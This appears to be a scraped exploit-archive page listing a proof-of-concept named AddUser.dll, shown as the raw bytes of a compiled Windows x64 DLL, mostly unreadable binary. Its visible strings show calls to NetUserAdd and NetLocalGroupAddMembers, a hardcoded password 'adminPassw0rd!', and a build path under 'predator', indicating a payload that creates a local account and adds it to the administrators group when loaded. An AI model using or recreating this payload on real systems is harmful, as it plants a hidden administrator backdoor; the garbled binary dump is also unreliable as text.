4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / AddUser.dll DLL
MZ����@���	�!�L�!This program cannot be run in DOS mode.

$�fi�e:�e:�e:��:�e:�	;�e:�
;�e:�;�e:�;�e:�	;�e:�e	:�e:;�e:�:�e:
;�e:Rich�e:PEd���a�" ��p`�(xP�@�`(�!pP"8 .text� `.rdata2
 @@.dataH0"@�.pdata�@$@@.rsrc�P&@@.reloc(`(@B@UH��$��H�� H��H3�H����t	�����xL�M��vL�E�3��E�l�E��s�J�E�E��E�D��H�E��E��H�D$0L�M�H�E��E��H�D$(L�EH��3�H�U�H�D$ �L3��D$\�D$XL�D$HH�D$tE3ɉD$|W�H�E��D$pH�D$H3�H�E�A�QH�D$P�D$`��H�E��D$ L�L$@H�D$@A�H�U3�n3�H��H3��%H�� ]�������������������ff�H;
�uH��f����u�H�����H��(��t9��t(��t��t
�H��(��Z��+��H��(�I��H��(�M����H��(�H�\$H�t$H�|$ AVH�� H��L��3��������Q�؈D$@@��=�#����#���tO�	���H�H�
����u)�9��t H��H�
���l#@2����@��u?��H��H�8t$H�����tL�ƺI��H�L�
nA�����3�H�\$0H�t$8H�|$HH�� A^ù�����H�\$WH��0@���E��
3�H�\$@H��0_�ȉ,�7�؈D$ �=�"u7�K�����%�"����3�@�����ۃ��M��뢹�#���H��H�X L�@�PH�HVWAVH��@I��L���u9�3����B���wEH��
H��u
�D$0��[
�؉D$0����L�Ƌ�I������؉D$0����L�Ƌ�I�������؉D$0��u6��u2L��3�I�����H��������H�W
H��tL��3�I�����t��u@L�Ƌ�I���.����؉D$0��t)H�
H��u	�X�\$0�L�Ƌ�I����؉D$0�3ۉ\$0��H�\$xH��@A^_^����H�\$H�t$WH�� I����H��u�L�Nj�H��H�\$0H�t$8H�� _������@SH�� H��3�oH��n�XH�Ⱥ	�H�� [H�%<H�L$H��8�� ��t��)H�
��H�D$8H��H�D$8H��H�-H��H��H�D$@H����	������Hk�H�
�H��Hk�H�
MH�L �Hk�H�
0H�L H�
����H��8���@SVWH��@H���
H���3�E3�H�T$`H��e
H��t9H�d$8H�L$hH�T$`L��H�L$0L��H�L$pH�L$(3�H�\$ �&
�ǃ�|�H��@_^[����H�\$ UH��H�� H��H�2��-�+H;�utH�eH�M��	H�EH�E��	��H1E��	��H�M H1E��	�E H�MH�� H3E H3EH3�H�������H#�H�3��-�+H;�HD�H�H�\$HH��H��H�� ]�H�
�H�%
	��H�
���H���H���H��(���H�$���H�H��(��H��(���t!eH�%0H�H�H;�t3��H�
lu�2�H��(��H��(�k��t���S�����t2����H��(�H��(3��=����H��(����H��(�s��u2���f��u�]��H��(�H��(�K�F�H��(����H�\$H�l$H�t$WH�� I��I���H������u��uL��3�H��H���H�T$X�L$PH�\$0H�l$8H�t$@H�� _�H��(���tH�
lH��(����u�H��(�H��(3��H��(�@SH�� �'�ɻDÈ�v�q��u2���d��u	3��Y���H�� [����@SH�� �=���ug��wj����t(��u$H�
��	��uH�
����t.2��3foIH����H����H���q�H�� [ù���H��L���MZf9Y�uxHc
��H�I�Hʁ9PEu_�f9AuTL+��AH�QH��AH��L��H�$I;�t�JL;�r
�B�L;�rH��(��3�H��u2���z$}2��
��2��2�H���@SH�� ����3҅�t��uH��H�� [�@SH�� �=���t��u�������H�� [����H��Ã%��H�\$UH��$@���H���ٹ����t���)�����3�H�M�A���KH�M��H���H���H��E3���H��t<H�d$8H���H���L��H�L$0L��H���H�L$(H�M�H�L$ 3�:H���H�L$PH���3�H���A��H��H����H���H�D$`�D$P@�D$T����H�D$PH�D$@H�E���H�D$H3��H�L$@����u��u�H���H��$�H��]��H�\$WH�� H�H�=�H�H��t� H��H;�r�H�\$0H�� _�H�\$WH�� H��
H�=�
�H�H��t��H��H;�r�H�\$0H�� _���H�\$H�t$WH��3�3��D��E3�D��A��ntelA��GenuD�ҋ�3�A�CE��A��ineI�$Eʉ\$���L$�T$uPH�
k�%�?�=�t(=`t!=pt������ w$H�H��sD�HA��D�=�D�4�D�H�;�|&3���$D�ۉ\$�L$�T$��	s
E�D���D�
�����D�
������sy��ss3��H�� H�H�T$ H�D$ "�:�uW�����y�wA�� t8�� �`�^��D#�D;�uH�D$ $�<�u
�
?@�5H�\$(3�H�t$0H��_���̸���3�9(�������%��%��%��%��%��%��%��%��%��%|�%��̰��3���H��(M�A8H��I���
�H��(����@SE�H��A��L��A�L��tA�@McP��L�Hc�L#�Ic�J�H�C�HH�C�Dt�D���L�L3�I��[�����������������ff�����������������������ff��%
@UH�� H��M@H�� ]�����@UH�� H��M ����H�� ]��@UH�� H��H�� ]�O����@UH��0H��H��H�L$(�T$ L�
�L�Ep�UhH�M`����H��0]��@UH��H�3Ɂ8�����]��f*P*-�,�,�,�,�,~,j,V,8,,,�+�+�*�*�*�*�*�+X++>+z+�++,+P�P�����P0��0�����������������adminPassw0rd!��aD\$\��a�$���a
H�$���a80�!� !�$�!�(!�0!�06�$,D$?��]sC6h|����T��RSDS8/��\k>G�>��I�Z:\predator\AddUser\x64\Release\AddUser.pdbGCTL�.text$mn�6.text$mn$00�.text$x .idata$5!(.00cfg8!.CRT$XCA@!.CRT$XCZH!.CRT$XIAP!.CRT$XIZX!.CRT$XPA`!.CRT$XPZh!.CRT$XTAp!.CRT$XTZ�!�.rdata$\.rdata$voltmd\$�.rdata$zzzdbg'.rtc$IAA'.rtc$IZZ'.rtc$TAA'.rtc$TZZ '�.xdata�(d.idata$2().idata$3@).idata$4P*�.idata$60@.data@0.bss@�.pdataP`.rsrc$01`P�.rsrc$02"dP\t	d42�w��2P

4
Rp>-VF_j-_kFB	4r�p`��Z�RPd42p		brp`020

4	
2P	"�%�%PdT42p4��P

4
2pd4p0@)z* �)�*� �)+� *�+� X)$- f*P*-�,�,�,�,�,~,j,V,8,,,�+�+�*�*�*�*�*�+X++>+z+�++,+�CreateWellKnownSid�LookupAccountSidWADVAPI32.dll�NetUserAdd�NetLocalGroupAddMembersNETAPI32.dll__C_specific_handler%__std_type_info_destroy_list>memsetVCRUNTIME140.dll6_initterm7_initterm_e?_seh_filter_dll_configure_narrow_argv3_initialize_narrow_environment4_initialize_onexit_table"_execute_onexit_table_cexitapi-ms-win-crt-runtime-l1-1-0.dll�RtlCaptureContext�RtlLookupFunctionEntry�RtlVirtualUnwind�UnhandledExceptionFilterSetUnhandledExceptionFilter GetCurrentProcess�TerminateProcess�IsProcessorFeaturePresentRQueryPerformanceCounter!GetCurrentProcessId%GetCurrentThreadId�GetSystemTimeAsFileTimeoInitializeSListHead�IsDebuggerPresentKERNEL32.dll�] �f��2��-�+����/ �D '`~8'���'��<'�l�'l��'��(�0(�(�Y$(\8(4O�'P��'���'���'��'�'xl(x��'���'�0(�0(�,D(,P0(Py0(���(��(P�(T��(\y�'|��(���(�(-x'-Fx'FZx'Z�(��d(�0�	H`P�<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
</assembly>
 (�� �(�0���������ȢP�h�p�x���